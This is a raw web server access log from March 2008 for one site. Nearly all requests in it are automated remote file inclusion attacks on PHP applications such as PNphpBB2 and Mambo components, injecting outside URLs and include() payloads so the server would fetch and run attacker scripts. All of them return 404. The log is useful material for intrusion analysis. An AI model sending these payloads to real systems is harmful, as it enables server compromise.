65.91.249.193 - - [31/Mar/2008:18:52:45 -0700] "GET /logs//OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.9.159.213 - - [31/Mar/2008:18:54:11 -0700] "GET //OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
72.9.159.213 - - [31/Mar/2008:18:56:38 -0700] "GET //OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../puki.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
62.163.141.54 - - [31/Mar/2008:18:56:43 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.col.fr/img/xpll.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
201.14.43.233 - - [31/Mar/2008:18:57:38 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sbc.sytu.edu.cn/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:57:44 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:18:57:53 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:02:18 -0700] "GET /logs/access.log//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:02:18 -0700] "GET //forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:02:18 -0700] "GET /logs//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:19:03:18 -0700] "GET /logs/access_080101.log/index.php?table=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:19:03:19 -0700] "GET /index.php?table=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:19:03:19 -0700] "GET /logs/index.php?table=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:03:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:03:58 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:03:58 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:04:02 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:04:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:04:02 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:19:04:33 -0700] "GET /middle.php?file=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.75.39 - - [31/Mar/2008:19:05:14 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:19:05:24 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.greytauctions.org/phpAdsNew/auctions.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:19:05:24 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.greytauctions.org/phpAdsNew/auctions.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:19:05:30 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.162.208.116 - - [31/Mar/2008:19:08:08 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.jef.at/sp/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
213.162.208.116 - - [31/Mar/2008:19:08:08 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.jef.at/sp/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:19:09:24 -0700] "GET /logs/index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:19:09:25 -0700] "GET /index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.118.102.153 - - [31/Mar/2008:19:09:42 -0700] "GET /logs/index.php?option=com_remository&Itemid=&func=fileinfo&id=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.bsfadvisors.com"
87.118.102.153 - - [31/Mar/2008:19:09:43 -0700] "GET /index.php?option=com_remository&Itemid=&func=fileinfo&id=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.bsfadvisors.com"
211.58.254.89 - - [31/Mar/2008:19:12:06 -0700] "GET /logs/access_080201.log/index.php?table=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:19:13:46 -0700] "GET /logs/access.log/middle.php?file=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:19:13:46 -0700] "GET /logs/middle.php?file=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.53.141.2 - - [31/Mar/2008:19:15:17 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.53.141.2 - - [31/Mar/2008:19:15:17 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:17:58 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:17:58 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:17:58 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:17:58 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
193.6.50.161 - - [31/Mar/2008:19:18:15 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.jef.at/sp/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
193.6.50.161 - - [31/Mar/2008:19:18:15 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.jef.at/sp/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:21:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:21:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
87.118.102.153 - - [31/Mar/2008:19:21:20 -0700] "GET /logs/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.bsfadvisors.com"
87.118.102.153 - - [31/Mar/2008:19:21:20 -0700] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:23:12 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:23:12 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:19:23:51 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:19:24:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
85.14.216.89 - - [31/Mar/2008:19:26:59 -0700] "GET /logs/access_080101.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
74.53.141.2 - - [31/Mar/2008:19:27:45 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.53.141.2 - - [31/Mar/2008:19:27:45 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.195.44.111 - - [31/Mar/2008:19:28:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
67.195.44.97 - - [31/Mar/2008:19:28:17 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
216.75.35.118 - - [31/Mar/2008:19:28:48 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://www.johan-potgieter.com/bg/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:28:49 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:28:50 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:19:28:50 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.6.22.90 - - [31/Mar/2008:19:28:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.19.61 - - [31/Mar/2008:19:29:02 -0700] "GET /logs/access_080301.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
69.93.48.162 - - [31/Mar/2008:19:29:46 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [31/Mar/2008:19:29:46 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
85.14.216.89 - - [31/Mar/2008:19:29:57 -0700] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:19:32:18 -0700] "GET /logs/access.log/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:19:32:18 -0700] "GET /logs/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:19:34:18 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
213.16.114.162 - - [31/Mar/2008:19:34:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:35:27 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:35:27 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:35:28 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.255.32.189 - - [31/Mar/2008:19:35:29 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
213.16.114.162 - - [31/Mar/2008:19:35:37 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.9.37.130 - - [31/Mar/2008:19:36:47 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.bsfadvisors.com"
69.9.37.130 - - [31/Mar/2008:19:36:48 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:19:37:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:19:40:11 -0700] "GET /logs/access.log/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:19:40:11 -0700] "GET /logs/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:19:40:16 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:19:40:17 -0700] "GET /administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:19:40:40 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:19:40:40 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
65.18.211.206 - - [31/Mar/2008:19:44:55 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.bioheatings.com/_private/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
65.18.211.206 - - [31/Mar/2008:19:44:55 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.bioheatings.com/_private/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:45:15 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:45:15 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
69.9.37.130 - - [31/Mar/2008:19:45:21 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.bsfadvisors.com"
69.9.37.130 - - [31/Mar/2008:19:45:22 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:45:39 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.216.249.151 - - [31/Mar/2008:19:45:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
205.234.129.50 - - [31/Mar/2008:19:46:19 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.bioheatings.com/_private/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.bsfadvisors.com"
205.234.129.50 - - [31/Mar/2008:19:46:20 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.bioheatings.com/_private/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:19:52:44 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:19:52:51 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:19:52:53 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:19:53:00 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:19:53:02 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:19:53:08 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:19:57:54 -0700] "GET /logs/access_071201.log/index.php?body=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:19:57:55 -0700] "GET /index.php?body=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:19:57:55 -0700] "GET /logs/index.php?body=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [31/Mar/2008:19:58:25 -0700] "GET /logs/access_071101.log/index.php?body=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
